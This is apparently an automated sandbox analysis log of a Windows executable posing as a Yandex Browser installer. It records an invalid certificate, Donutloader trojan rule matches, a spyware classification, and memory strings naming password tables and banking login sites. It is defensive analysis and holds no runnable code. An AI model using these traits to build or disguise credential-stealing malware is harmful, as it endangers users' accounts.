          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059551641_2_05955164
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 00875190 appears 118 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 008347C0 appears 233 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 0086D640 appears 544 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 00836CF0 appears 65 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 008B2120 appears 43 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 00875540 appears 93 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 0595EEF4 appears 34 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 0091B1C0 appears 76 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 00903510 appears 81 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 00875590 appears 35 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 059815AB appears 57 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 059815DE appears 50 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 00900640 appears 48 times
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: String function: 008AFB90 appears 46 times
          Source: 0x001900000002ab40-59.exeStatic PE information: invalid certificate
          Source: 0x001900000002ab40-59.exeStatic PE information: Resource name: BIN type: Microsoft Cabinet archive data, 2408 bytes, 1 file, at 0x2c +A "brand_config", number 1, 1 datablock, 0x1 compression
          Source: 0x001900000002ab40-59.exeBinary or memory string: OriginalFilename vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exe, 00000001.00000000.1519545162.0000000000933000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: file_version_info_win.ccCreateFileVersionInfoWinCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionProductChromiumVersionProductYandexVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls\VarFileInfo\Translation\GetHandleVerifierGenuineIntel vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: file_version_info_win.ccCreateFileVersionInfoWinCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionProductChromiumVersionProductYandexVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls\VarFileInfo\Translation\GetHandleVerifierGenuineIntel vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exeBinary or memory string: |Jfile_version_info_win.ccCreateFileVersionInfoWinCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionProductChromiumVersionProductYandexVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls\VarFileInfo\Translation\GetHandleVerifierGenuineIntel vs 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: classification engineClassification label: mal88.troj.spyw.winEXE@1/2@2/2
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0086C530 GetLastError,GetModuleHandleW,FormatMessageA,_strlen,_strlen,GetLastError,_strlen,1_2_0086C530
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008BA790 _strlen,_strlen,_strlen,_strlen,GetDiskFreeSpaceExW,1_2_008BA790
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A09A0 CreateToolhelp32Snapshot,1_2_008A09A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00858230 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource,1_2_00858230
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\76561199619938930[1].htmJump to behavior
          Source: 0x001900000002ab40-59.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691320920.0000000008320000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1670130730.000000000830C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 0x001900000002ab40-59.exeVirustotal: Detection: 19%
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: /installstats/send/dtype=stred/pid=457
          Source: 0x001900000002ab40-59.exeString found in binary or memory: show-uac-at-browser-start
          Source: 0x001900000002ab40-59.exeString found in binary or memory: install-start-time-no-uac
          Source: 0x001900000002ab40-59.exeString found in binary or memory: program-files-installation
          Source: 0x001900000002ab40-59.exeString found in binary or memory: do-not-launch-browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: parent-installer-process-id
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://storage.ape.yandex.net/get/browser/install
          Source: 0x001900000002ab40-59.exeString found in binary or memory: /support/browser/about/install.xml
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: TBrandFilePartnerFilebrandlangGetInfoBrand package path: Partner package path: GetInfoFromResourcesExtract Partner package: [B]partner_configPartner package is empty.Fetching autodetected packageBRAND_Fetching definedFetching default packageExtract Brand package: brand_configBrand package is empty.https://download.cdn.yandex.net/browser/installer/alice/scenarios//browser-setup.archttps://download.cdn.yandex.net/browser/https://api.browser.yandex.net/content/get/experiments/browser.protohttps://api.browser.yandex.ru/ab/gethttps://webntp.yandex.ruClearReset brand info.ApplyBrandInfoFailed to load json : Incorrect format of jsonlanguages.interfaceinstall.setup_urlinstall.setup_url_versioninstall.setup_url64install.setup_url_version64install.setup_url32install.setup_url_win7install.alternate_installer_titleinstall.send_statisticsinstall.make_browser_defaultinstall.scenarios_urlinstall.slide_urlinstall.slide_url_if_taggedurls.variationsurls.abturls.webntpinstall.preloaded_wallpapers_urlinstall.pinFound install.pininstall.yapin_trial_stateoverridden_features.InstallerNewIdentity2024overridden_features.InstallerNewIdentity2024.params.firstScreenOffoverridden_features.InstallerNewIdentity2024.params.dialogsRedesignInstallerNewIdentity2024: firstScreenOff = , dialogsRedesign = overridden_features.InstallerDarkTheme2024overridden_features.InstallerDarkTheme2024.enabledInstallerDarkTheme2024: enabled = ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
          Source: 0x001900000002ab40-59.exeString found in binary or memory: GetModuleCreationTimeFile version resource is absent in Version time is 0 in Used the last write file timeDownloadAttempt to download module: baneridyandexuiddistr_yandexuid0c0f0f0d-6434-4cfd-a5e9-23e9ca4d94b6fef32d6d-67e9-4654-b314-6c72098ff5d1ExtractInstallerDataIfAbsentFailed to extract resource InstallerDataClidsFileYandexWebsiteIconFileAbtConfigResourceFileunknown~InstallerFailed to wait for install async exit. Terminate install_thread_RunModuleAndWaitRun: Create process failed.Process created: Wait for process finish.Wait process failed.Get setup process exit code failed.Setup process exit with code: downloadactionerrorstage-attempt-errorurlredirectdownload_attemptsuccessstatusfailedattempt_numberdownloaded_sizetotal_sizex64https://storage.ape.yandex.net/get/browser/install?ui=&result=cancelled&time=&download_time=&install_time=ReportInstallationFinishedCannot report installation status: DownloadOrExtractModuleCannot create file:Try to download module:IsVersionedSetupUrlAllowedWrong setup url:https://download.cdn.yandex.net/browser-partners/_xp_builds/browser-setup.arcGetDownloadUrlsFromBrandConfigSetup url x64 empty!Setup url x32 empty!DownloadModuleSetup url is empty.Selected download urls:Installation stoppedMax download attempts failedInstallWrong overridden partner package path:Partner package override is:Partner package override found: GetModulePathCannot obtain temp file.GetModuleModule was not downloaded: Module downloaded: normalRunModuleInElevatedProcessStarted waiting the elevated installer has finished its work.The elevated installer has finished, success=InstallBrowserInstall Browser.setup_arc_permanent_lockExecutable path: Installation after download event isn't in signal state or installation was stopped early.Cannot lock file: Module verification failed: Verification succeeded: Unexpected error in CreateDelayedParamsMapping()ExtractBrowserSetupResourceWrite failed. Roll back write operation.clicked_buttonclicked_linkchosen_checkboxliteinstalldialog_windowinstall_browser_button_clicked10checkbox_defaultcheckbox_sendstatinstaller_starteddpiresolutionstartedfinisheddownload_timesetup_arc_lockverificationsetupupdatesetup_exe_launched100uacsetup_exe_exitedFailedToStartsetup_timeWriteDelayedParamsToo large string length, browser_arc_path= clids_file_path= yandex_website_icon_file_path= installer_data_path= brand_package_path= partner_package_path= partner_package_override_path= histogram_download_time= histogram_full_time= send_statistics= make_default= install_yapin=EnsureProcessFinishedThe elevated installer hangs and must be forcibly terminated.RunModuleThe elevated installer was terminated due to stop event.Failed to get exit code of the elevated installer.NeedStartThisProcessAsAdminUser is not in admin group.Windows version is not suitable for elevated restart.Found non install-switch:Run-as-admin functionality is already enabled.Elevated run is necessary but silent instalation is requested - UAC will not be shown.fake_browse
          Source: 0x001900000002ab40-59.exeString found in binary or memory: /support/browser/about/install.xml
          Source: 0x001900000002ab40-59.exeString found in binary or memory: ua-ukua-rucom.trintcom/support/browser/about/install.xmlhttps://yandex.Arial(
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: BINmsi-databasepartner-package-guid/GetYapinTrialStateNo install.pin for yapin_state=yapinruuktrdeesfritjapt-PTpt-BRzh-CNzh-TWkkuzcsenhttps://download.cdn.yandex.net/browser/installer/ybLocal\YandexBrowserLiteInstallerMutex-E523E369-4A72-4B13-AD57-5B956174172A/download&code=user32.dllChangeWindowMessageFilterExChangeWindowMessageFilterdefstatstatpromotruefirstdarkthemeSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeuts2uacBringProcessWindowToTopFailed to bring process window to top: wrong process idExtractPartnerPackageOverridePackageReading msi Failed to open msi file for reading, error= file_attrs=Failed to get source file size for extracted package validation.Failed to move file pointer for guid reading.Failed to read tailing guid markerTail GUID from msi does not match specified guid marker: guid_marker= tailing_guid=Failed to move file pointer for target position reading.Failed to move file pointer to target pos for package reading.Failed to read starting guid markerAppendix start GUID from msi does not match specified guid marker: Failed to read zip sizeFailed to read zip dataFailed to read signature sizeFailed to read signature dataZip verification failed: Failed to open target file for reading Failed to write file data to output file Unable to delete file: testids,CombineBrandAndDistribTestIdsDuplicate testid found: ..\..\third_party\libc++\src\include\string:1221: assertion __pos <= size() failed: string index out of bounds
          Source: 0x001900000002ab40-59.exeString found in binary or memory: install-start-time-no-uac
          Source: 0x001900000002ab40-59.exeString found in binary or memory: program-files-installation
          Source: 0x001900000002ab40-59.exeString found in binary or memory: do-not-launch-browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: show-uac-at-browser-start
          Source: 0x001900000002ab40-59.exeString found in binary or memory: parent-installer-process-id
          Source: 0x001900000002ab40-59.exeString found in binary or memory: brand-namebrand-packageclids-fileyandex-website-icon-fileabt-config-resource-filedisable-error-dialog-download-buttondistr-info-filedistr-info-paramsdistribution-channelhistogram-download-timemake-browser-default-after-importok-button-pressed-timethe-interface-availabilityinstall-start-time-no-uacpartner-packageprogram-files-installationprogress-windowsimulate-crashdo-not-launch-browserfake-rename-yandex-internetshow-uac-at-browser-startsend-statisticssilentsemi-silentuac-enabledset-as-default-browserset-as-default-browser-dllsetup-cmd-linedisable-uacparent-installer-process-idoverride-partner-packagecheck-the-interfacepttw1pwattw1pttw0disableyapinyapin-statevariations-update-pathabt-update-pathserver-config-bundle-pathpreloaded-wallpaper-bundle-pathwebntp-pathdownload-x32download-x64use-task-scheduler2browser-presentinstaller-brand-idinstaller-partner-idtestidsold_verinstaller_typeinstall_statlite_install_failedKNOWN_ERROR_msi_read_errorKNOWN_ERROR_untrusted_certificateidentity,browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: brand-namebrand-packageclids-fileyandex-website-icon-fileabt-config-resource-filedisable-error-dialog-download-buttondistr-info-filedistr-info-paramsdistribution-channelhistogram-download-timemake-browser-default-after-importok-button-pressed-timethe-interface-availabilityinstall-start-time-no-uacpartner-packageprogram-files-installationprogress-windowsimulate-crashdo-not-launch-browserfake-rename-yandex-internetshow-uac-at-browser-startsend-statisticssilentsemi-silentuac-enabledset-as-default-browserset-as-default-browser-dllsetup-cmd-linedisable-uacparent-installer-process-idoverride-partner-packagecheck-the-interfacepttw1pwattw1pttw0disableyapinyapin-statevariations-update-pathabt-update-pathserver-config-bundle-pathpreloaded-wallpaper-bundle-pathwebntp-pathdownload-x32download-x64use-task-scheduler2browser-presentinstaller-brand-idinstaller-partner-idtestidsold_verinstaller_typeinstall_statlite_install_failedKNOWN_ERROR_msi_read_errorKNOWN_ERROR_untrusted_certificateidentity,browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: brand-namebrand-packageclids-fileyandex-website-icon-fileabt-config-resource-filedisable-error-dialog-download-buttondistr-info-filedistr-info-paramsdistribution-channelhistogram-download-timemake-browser-default-after-importok-button-pressed-timethe-interface-availabilityinstall-start-time-no-uacpartner-packageprogram-files-installationprogress-windowsimulate-crashdo-not-launch-browserfake-rename-yandex-internetshow-uac-at-browser-startsend-statisticssilentsemi-silentuac-enabledset-as-default-browserset-as-default-browser-dllsetup-cmd-linedisable-uacparent-installer-process-idoverride-partner-packagecheck-the-interfacepttw1pwattw1pttw0disableyapinyapin-statevariations-update-pathabt-update-pathserver-config-bundle-pathpreloaded-wallpaper-bundle-pathwebntp-pathdownload-x32download-x64use-task-scheduler2browser-presentinstaller-brand-idinstaller-partner-idtestidsold_verinstaller_typeinstall_statlite_install_failedKNOWN_ERROR_msi_read_errorKNOWN_ERROR_untrusted_certificateidentity,browser
          Source: 0x001900000002ab40-59.exeString found in binary or memory: /installstats/send/dtype=stred/pid=457
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://api.browser.yandex.ru/installstats/send/dtype=stred/pid=457/cid=/path=/vars=extended_statyabrowser_reinstall_dialogyabrowser_pf_migrationzombo_window
          Source: 0x001900000002ab40-59.exeString found in binary or memory: Browser-InstallationGDer Yandex-Browser konnte auf diesem Computer nicht installiert werden.0SSE2 wird von Ihrem Prozessor nicht unterst
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: 0x001900000002ab40-59.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 0x001900000002ab40-59.exeStatic file information: File size 10445744 > 1048576
          Source: 0x001900000002ab40-59.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x111800
          Source: 0x001900000002ab40-59.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x83f600
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 0x001900000002ab40-59.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: 0x001900000002ab40-59.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\BuildAgent\work\6a6d135591f2f49f\src\out\Default\win_clang_x86\lite_installer.exe.pdb source: 0x001900000002ab40-59.exe
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 0x001900000002ab40-59.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F87E0 LoadLibraryW,GetProcAddress,TryAcquireSRWLockExclusive,ReleaseSRWLockExclusive,1_2_008F87E0
          Source: 0x001900000002ab40-59.exeStatic PE information: section name: SHARED
          Source: 0x001900000002ab40-59.exeStatic PE information: section name: Shared
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00900F8B push ecx; ret 1_2_00900F9E
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05981579 push ecx; ret 1_2_0598158C
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0086F990 rdtsc 1_2_0086F990
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeAPI coverage: 2.9 %
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009232F1 FindFirstFileExW,1_2_009232F1
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009233A5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_009233A5
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CD950 FindFirstFileExW,GetLastError,GetFileAttributesW,FindNextFileW,FindClose,1_2_008CD950
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089F490 GetLogicalDriveStringsW,QueryDosDeviceW,1_2_0089F490
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009007FF VirtualQuery,GetSystemInfo,1_2_009007FF
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691414851.00000000082C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1690685217.0000000008345000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
